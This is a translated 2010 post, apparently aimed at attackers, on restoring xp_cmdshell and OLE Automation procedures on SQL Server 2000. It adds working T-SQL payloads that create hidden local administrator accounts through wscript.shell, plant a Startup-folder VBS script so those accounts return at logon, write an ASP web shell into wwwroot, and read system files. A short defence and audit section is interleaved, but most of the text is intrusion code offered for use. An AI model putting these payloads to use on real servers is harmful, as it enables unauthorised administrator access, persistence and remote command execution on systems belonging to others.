2010-05-07 16:33

Restoring xp_cmdshell: the complete collection

Statement to recreate sp_addextendedproc (this is the stock SQL Server 2000 procedure body; its only real work is the dbcc addextendedproc call at the end):

create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),   /* (owner.)name of function to call */
@dllname varchar(255)       /* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO


A newer way to restore xp_cmdshell (it does not matter whether sp_addextendedproc still exists, because dbcc addextendedproc is what sp_addextendedproc calls internally; like sp_addextendedproc it requires sysadmin):


Removal:

drop procedure sp_addextendedproc

drop procedure sp_oacreate

exec sp_dropextendedproc 'xp_cmdshell'


Restore:

dbcc addextendedproc ("sp_oacreate","odsole70.dll")

dbcc addextendedproc ("xp_cmdshell","xplog70.dll")


1. Fix for "Could not find stored procedure 'master..xp_cmdshell'":


EXEC sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

-- on SQL Server 7.0 the procedure is exported by xpsql70.dll instead:
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'


2. "Cannot load the DLL xpsql70.dll, or one of the DLLs it references. Reason: 126 (The specified module could not be found.)":

The registration points at a DLL the server cannot find on disk. Drop the entry and re-register against the DLL that exists for this version (xpsql70.dll on SQL Server 7.0, xplog70.dll on SQL Server 2000). If the DLL itself has been deleted from the Binn directory, re-registering still fails with reason 126 until the file is put back (see the upload step further down).

sp_dropextendedproc "xp_cmdshell"
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'


3. "Cannot find the function xp_cmdshell in the library xpweb70.dll. Reason: 127 (The specified procedure could not be found.)":

This error means the registration names a DLL that does not export xp_cmdshell: xpweb70.dll holds the xp_makewebtask family, not xp_cmdshell, so re-registering against xpweb70.dll only reproduces the error. Drop the bad entry and re-register against the DLL that does export it:

exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'


4. Adding an account directly


Dropping the odsole70.dll (OLE Automation) procedures:


exec master..sp_dropextendedproc sp_oamethod

exec master..sp_dropextendedproc sp_oacreate


Restoring the odsole70.dll procedures:


exec sp_addextendedproc sp_OAMethod,'odsole70.dll'

exec sp_addextendedproc sp_OACreate,'odsole70.dll'


Commands to add an account directly (replace <username> and <password>):


declare @shell int
exec sp_oacreate 'wscript.shell', @shell output
exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c net user <username> <password> /add'
exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c net localgroup administrators <username> /add'


5. Some commonly used SQL statements when restoring:


Use sp_addextendedproc to restore most of the commonly used extended stored procedures (sp_addextendedproc itself must first be recreated with the statement at the top of this page):

use master
-- xp_cmdshell is exported by xplog70.dll on SQL Server 2000 (there is no xp_cmdshell.dll)
exec sp_addextendedproc xp_cmdshell,'xplog70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'


Restore xp_cmdshell: exec sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'


Check whether the extended procedure is registered (a result of 1 means it is):

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'


Restore xp_cmdshell and check in one statement (a result of 1 means it worked):

exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'


Otherwise upload xplog70.dll and register it by its full path:

exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
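The steps of this section, restore and verify, put together as one script. This is an added example, not code from the original post: it assumes SQL Server 2000, a sysadmin login, and that xplog70.dll is still present in the instance's Binn directory (on SQL Server 7.0 the DLL name is xpsql70.dll). The point it adds is the last step: a registration that points at a missing or wrong DLL only fails when the procedure is actually called, so the count-of-sysobjects check alone proves nothing about the DLL.

```sql
-- Added example: conditional restore of xp_cmdshell on SQL Server 2000,
-- followed by a check that the registered DLL really loads.
use master
go

-- 1. Re-register only if the entry is gone. dbcc addextendedproc is the
--    call sp_addextendedproc makes internally, so it works even after
--    sp_addextendedproc itself has been dropped.
if not exists (select * from dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell')
begin
    dbcc addextendedproc ('xp_cmdshell', 'xplog70.dll')
end
go

-- 2. Show which DLL the entry now points at (columns: name, dll_name).
exec dbo.sp_helpextendedproc 'xp_cmdshell'
go

-- 3. Registration is only a catalog row. A wrong DLL name surfaces here,
--    at call time, as reason 126 (module not found) or 127 (function not
--    found in the DLL). Capture the output so the result can be inspected.
create table #out (line varchar(8000) null)
insert into #out exec dbo.xp_cmdshell 'cmd.exe /c ver'
select line from #out where line is not null
drop table #out
go
```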


************************ The following is for defence ************************

1. Drop all dangerous extended procedures:

Drop PROCEDURE sp_makewebtask
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_process
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistring
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
-- sp_add_job and sp_addtask are ordinary T-SQL procedures in msdb, not
-- extended procedures, so these two calls fail; they are kept only because
-- the original list had them
exec master..sp_dropextendedproc sp_add_job
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwrite
exec master..sp_dropextendedproc xp_readwebtask
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistring
Drop PROCEDURE sp_addextendedproc

Dropping these is not a real control on its own: as the restore section at the top of this page shows, any sysadmin login puts them all back with one dbcc addextendedproc per procedure, so the lasting fix is to keep application logins out of sysadmin and to fix the sa password (item 3 below).


2. Drop the xp_cmdshell extended procedure: sp_dropextendedproc 'xp_cmdshell'


3. Fix a weak sa password: exec sp_password NULL, 'NewPassword', 'sa'
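An audit script for the defender's side of the page, added here as an example that is not part of the original post. Part 1 uses the SQL Server 2000 catalog tables the page already queries (sysobjects, plus syslogins and sp_helpextendedproc) to answer the three questions a drop-and-forget cleanup leaves open: what is registered, what was registered recently, and who can register things. Part 2 assumes SQL Server 2005 or later, where the supported control is the sp_configure switch rather than dropping the procedure.

```sql
-- Added example: audit the state the "defence" section is trying to reach.
use master
go

-- 1a. Every registered extended procedure with the DLL behind it
--     (columns: name, dll_name). An unfamiliar DLL name, or a path outside
--     the instance's Binn directory, is what a re-registration looks like.
exec dbo.sp_helpextendedproc
go

-- 1b. Extended procedures (re)registered in the last 7 days. Dropping
--     xp_cmdshell is undone by one statement, so check the creation date
--     instead of trusting an earlier cleanup.
select name, crdate
from dbo.sysobjects
where xtype = 'X' and crdate > dateadd(day, -7, getdate())
order by crdate desc
go

-- 1c. Who can re-register at all: every member of the sysadmin role.
--     An application login in this list makes everything above moot.
select name
from dbo.syslogins
where sysadmin = 1
go

-- 2. SQL Server 2005 and later: turn the features off through
--    configuration instead of dropping catalog entries.
exec sp_configure 'show advanced options', 1
reconfigure
exec sp_configure 'xp_cmdshell', 0
exec sp_configure 'Ole Automation Procedures', 0
reconfigure
go
```

Run part 1 from a sysadmin connection; the sysobjects and syslogins queries return nothing useful from a low-privilege login, which is itself the property you want.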


IV. The ultimate method. If none of the methods above restores xp_cmdshell, try adding an account directly as follows:
1. After connecting with Query Analyzer,
On Windows 2000 Server:
declare @shell int
exec sp_oacreate 'wscript.shell', @shell output
exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net user yszar andylau /add'
exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net localgroup administrators yszar /add'

On Windows XP or Windows Server 2003 (the system directory is c:\windows rather than c:\winnt):

declare @shell int
exec sp_oacreate 'wscript.shell', @shell output
exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c net user <username> <password> /add'
exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c net localgroup administrators <username> /add'

Or, in general:

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'XXXXX'   -- XXXXX is the command you want to run


Sometimes, when running the statements above from Query Analyzer, you get "Could not find stored procedure sp_addextendedproc".

Solution:

create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),   /* (owner.)name of function to call */
@dllname varchar(255)       /* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
Paste this code into Query Analyzer and execute it.


1. Getting around a missing xplog70.dll (create the account through sp_oacreate instead of xp_cmdshell)

declare @cmd INT
exec sp_oacreate 'wscript.shell', @cmd output
-- run(command, window style 0 = hidden, wait for the command to return)
exec sp_oamethod @cmd, 'run', null, 'net user <username> <password> /add', '0', 'true'
exec sp_oamethod @cmd, 'run', null, 'net localgroup administrators <username> /add', '0', 'true'

2. Restoring xp_cmdshell
First try to restore xp_cmdshell with sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll';
it turns out xpsql70.dll has been deleted.

So instead write a .vbs file into the Startup group (the path below is the Startup folder of a Chinese-language Windows install; adjust it for other locales):
declare @o int, @f int, @t int, @ret int, @a int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\docume~1\alluse~1\「开始」菜单\程序\启动\a.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 'set wshshell=createobject("wscript.shell")'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'a=wshshell.run ("cmd.exe /c net user lintao lintao520 /add",0)'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'b=wshshell.run ("cmd.exe /c net localgroup administrators lintao /add",0)'
-- close the text stream so the file is flushed to disk
exec sp_oamethod @f, 'close'

3. Taking xp_cmdshell away from sa
If you do not need the extended stored procedure xp_cmdshell, remove it with this SQL statement:
use master
sp_dropextendedproc 'xp_cmdshell'
xp_cmdshell is the shortest path from the database into the operating system, a wide-open back door the database leaves to the OS. If you do need the procedure, this statement brings it back (xpsql70.dll is the SQL Server 7.0 DLL; on SQL Server 2000 use xplog70.dll):
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

4. Upload xplog70.dll and register it by full path:

exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

'net start telnet': its effect is to run net start telnet on the server through wscript.shell, which starts the server's Telnet service. You will surely have thought of FSO! Yes, we can also use it for file management, for example:

declare @o int, @f int, @t int, @ret int, @c varchar(8000)
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
select @c = ''
while (@ret = 0)
begin
select @c = @c + @line + char(13) + char(10)
exec @ret = sp_oamethod @f, 'readline', @line out
end

This reads the contents of c:\boot.ini into the local variable @c (readline returns a non-zero result at end of file, which is what ends the loop). To get the contents out, just create a temporary table and write it there. The same method can also create a file and write data into it, for example:

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run("cmd.exe /c "&request.querystring("cmd")) %>'

This creates a two-line ASP web shell at c:\inetpub\wwwroot\foo.asp. This method avoids the large amount of junk data that comes with using backups, and the hassle of creating a temporary table that comes with the sp_makewebtask extended procedure.
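The FSO read above, carried through to the temporary table the text mentions and with the error handling the one-liners on this page leave out. This is an added example, not code from the original post. Every sp_OA* procedure returns an HRESULT: 0 is success and anything else should be decoded with sp_OAGetErrorInfo before the objects are released, which is also how you tell "file not found" from the expected non-zero result ReadLine returns at end of file. It assumes a sysadmin login (or execute rights on the sp_OA* procedures), that the odsole70.dll procedures are registered, on SQL Server 2005+ that 'Ole Automation Procedures' is enabled, and a readable file at the assumed path c:\boot.ini.

```sql
-- Added example: read a text file line by line through FSO into a temp
-- table, checking every OLE call and releasing the objects afterwards.
declare @hr int, @fso int, @file int
declare @path varchar(255), @line varchar(8000)
declare @src varchar(255), @desc varchar(255)
set @fso = null
set @file = null
set @path = 'c:\boot.ini'   -- assumed path; any readable text file works

create table #lines (n int identity(1,1), line varchar(8000))

exec @hr = sp_OACreate 'Scripting.FileSystemObject', @fso out
if @hr <> 0 goto oa_error

-- OpenTextFile(path, ForReading = 1); this is where a missing file fails
exec @hr = sp_OAMethod @fso, 'OpenTextFile', @file out, @path, 1
if @hr <> 0 goto oa_error

-- ReadLine returns a non-zero HRESULT once EOF is reached; that is what
-- ends the loop, so a failure here is expected rather than an error
exec @hr = sp_OAMethod @file, 'ReadLine', @line out
while @hr = 0
begin
    insert into #lines (line) values (@line)
    exec @hr = sp_OAMethod @file, 'ReadLine', @line out
end
goto cleanup

oa_error:
    -- decode the failing call: COM source and description text
    -- (a NULL object token returns the error info for the whole batch)
    exec sp_OAGetErrorInfo @fso, @src out, @desc out
    print 'OLE error ' + convert(varchar(11), @hr) + ': '
        + isnull(@src, '') + ' - ' + isnull(@desc, '')

cleanup:
    -- release the COM objects instead of waiting for the batch to end
    if @file is not null exec sp_OADestroy @file
    if @fso is not null exec sp_OADestroy @fso
    select n, line from #lines order by n
    drop table #lines
```

The same create / call / check / destroy pattern applies to the wscript.shell 'run' calls earlier on the page; without the HRESULT check a failed run (object not registered, wrong path, command not found) simply returns nothing, which is why the "if none of the above works" sections exist.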
